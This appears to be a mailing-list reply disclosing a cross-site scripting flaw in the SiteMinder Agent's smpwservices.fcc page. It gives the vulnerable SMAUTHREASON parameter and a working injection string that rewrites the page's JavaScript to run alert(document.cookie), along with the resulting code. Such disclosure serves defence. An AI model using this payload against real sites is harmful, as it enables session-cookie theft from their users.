Re: Re: SiteMinder Agent: Cross Site Scripting
I don't know the details of vulnerable version but smpwservices.fcc page was
accessed directly in the tested version.
Exploit code was triggered like this:
[*] with the URL:
https://www.example.com/siteminderagent/forms/smpwservices.fcc?SMAUTHREASON=X
I can view this javascript code in the result page:
---
function resetCredFields()
{
if (X == 0 || X == 4 || X == 5 || X == 28 || X == 30 )
{
document.PWChange.PASSWORD.value = '';
}
else if (X == 1 || X == 18 || X == 20 || X == 22 || X == 31 || X == 34)
{
document.PWChange.NEWPASSWORD.value = '';
document.PWChange.CONFIRMATION.value = '';
}
}
---
this function was called by:
<BODY onLoad = 'resetCredFields();'>
[*] Inserting the string "1)alert(document.cookie);}function+drop(){if(0" as
SMAUTHREASON value we can modify resetCredFields() in this way:
function resetCredFields()
{
if (1)alert(document.cookie);}function drop(){if(0 == 0 ||
1)alert(document.cookie);}function drop(){if(0 == 4 ||
1)alert(document.cookie);}function drop(){if(0 == 5 ||
1)alert(document.cookie);}function drop(){if(0 == 28 ||
1)alert(document.cookie);}function drop(){if(0 == 30 )
{
document.PWChange.PASSWORD.value = '';
}
else if (1)alert(document.cookie);}function drop(){if(0 == 1 ||
1)alert(document.cookie);}function drop(){if(0 == 18 ||
1)alert(document.cookie);}function drop(){if(0 == 20 ||
1)alert(document.cookie);}function drop(){if(0 == 22 ||
1)alert(document.cookie);}function drop(){if(0 == 31 ||
1)alert(document.cookie);}function drop(){if(0 == 34)
{
document.PWChange.NEWPASSWORD.value = '';
document.PWChange.CONFIRMATION.value = '';
}
}
So, the alert code was executed.
Regards,
Giuseppe Gottardi